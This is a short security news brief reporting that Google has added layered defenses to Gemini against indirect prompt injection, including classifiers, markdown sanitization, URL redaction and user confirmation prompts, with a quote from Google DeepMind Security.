AI/ML

Google bolsters Gemini’s defenses against prompt injection intrusions

Google has fortified its Gemini generative artificial intelligence system with a multi-layered defense strategy that seeks to combat indirect prompt injections and other emerging AI security threats, reports The Hacker News.

Aside from integrating machine learning models aimed at identifying nefarious prompts, Google's Gemini has also been updated to include prompt injection content classifiers, security thought reinforcement, markdown sanitization and suspicious URL redaction, end-user security mitigation notices, and a user confirmation framework, according to Google. "We believe robustness to indirect prompt injection, in general, will require defenses in depth defenses imposed at each layer of an AI system stack, from how a model natively can understand when it is being attacked, through the application layer, down into hardware defenses on the serving infrastructure," said Google DeepMind Security. Such a development comes after a report from Anthropic, Google DeepMind, Carnegie Mellon University, and ETH Zurich researchers revealed large language models' ability to facilitate various illicit cyber activities.

An In-Depth Guide to AI

Get essential knowledge and practical strategies to use AI to better your security program.

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms of Use and Privacy Policy.

You can skip this ad in 5 seconds